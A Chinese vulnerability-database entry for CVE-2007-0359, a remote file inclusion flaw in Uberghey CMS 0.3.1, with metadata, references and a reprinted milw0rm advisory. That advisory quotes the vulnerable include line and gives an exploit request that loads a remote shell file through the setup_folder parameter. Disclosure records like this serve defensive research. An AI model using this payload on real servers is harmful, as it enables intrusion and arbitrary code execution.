Uberghey frontpage.php远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112029 漏洞类型 输入验证
发布时间 2007-01-17 更新时间 2007-01-21
CVE编号 CVE-2007-0359 CNNVD-ID CNNVD-200701-298
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-298
|漏洞详情
Uberghey是一种开源的基于PHP的Web内容管理系统。UbergheyCMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。Uberghey的frontpage.php脚本没有正确验证setup_folder参数的输入,允许攻击者通过包含本地或外部资源任意文件导致执行任意PHP代码。
|漏洞EXP
/###################################################################\
# Uberghey CMS 0.3.1                                                #
# =========================================================         #
# Published : 2007-01-17                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/uberghey/       #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends-ABDULLAH00-Dr.Hail-MoHaNdKo-SilVeR_FaLCoN-Z4E#
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /frontpag.php                                                     #
# LiNe:                                                             #
# /17                                                               #
# Vulnerable Code:                                                  #
# include("$setup_folder/i18n/$language/$page_id.inc");             #
# ExPlOiT :                                                         #
# /frontpage.php?setup_folder=shell.txt?                            #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\############################MAHMOOD_ALI############################/

# milw0rm.com [2007-01-17]
|参考资料

来源:MILW0RM
名称:3147
链接:http://www.milw0rm.com/exploits/3147
来源:VUPEN
名称:ADV-2007-0230
链接:http://www.frsirt.com/english/advisories/2007/0230
来源:VIM
名称:20070118sourceverify:UbergheyCMS0.3.1RFI
链接:http://www.attrition.org/pipermail/vim/2007-January/001247.html
来源:XF
名称:uberghey-frontpage-file-include(31553)
链接:http://xforce.iss.net/xforce/xfdb/31553
来源:BID
名称:22098
链接:http://www.securityfocus.com/bid/22098
来源:MILW0RM
名称:3147
链接:http://milw0rm.com/exploits/3147